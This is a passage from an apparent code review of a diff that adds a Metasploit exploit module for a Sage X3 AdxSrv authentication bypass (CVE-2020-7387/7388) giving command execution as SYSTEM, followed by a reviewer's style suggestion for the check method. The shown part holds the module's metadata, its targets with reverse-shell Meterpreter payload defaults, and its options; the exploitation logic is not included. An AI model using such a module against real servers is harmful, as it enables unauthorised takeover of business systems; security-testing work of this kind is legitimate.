modules/exploits/x3/x3_adxsrv_cmd.rb

```diff
@@ -0,0 +1,347 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sage X3 Administration Service Command Execution',
+        'Description' => %q{
+          This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration
+          protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an
+          available AdxAdmin service.
+        },
+        'Author' => [
+          'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk
+          'Aaron Herndon' # @ac3lives
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2020-07-07',
+        'References' =>
+          [
+            [ 'URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/'],
+            [ 'CVE', 'CVE-2020-7388'],
+            [ 'CVE', 'CVE-2020-7387']
+          ],
+        'Privileged' => true,
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+            'DisablePayloadHandler' => true
+          },
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true,
+                'PAYLOAD' => 'cmd/windows/generic',
+                'CMD' => 'whoami'
+              }
+            }
+          ],
+          [
+            'Custom Executable',
+            {
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true
+              }
+            }
+          ],
+          [
+            'Windows DLL',
+            {
+              'Platform' => [ 'windows' ],
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => false,
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Executable',
+            {
+              'Platform' => [ 'windows' ],
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => false,
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(1818),
+        OptPath.new('FILENAME', [false, 'File for CUSTOM_EXE target', '']),
+      ]
+    )
+  end
+
+  def check
+    if adxdir == false
+      return Msf::Exploit::CheckCode::Safe
+    end
+
+    return Msf::Exploit::CheckCode::Appears
+  end
```

Comment:
`Msf::Exploit::` prefix is redundant in exploit context.

```suggestion
  def check
    adxdir ? CheckCode::Appears : CheckCode::Safe
  end
```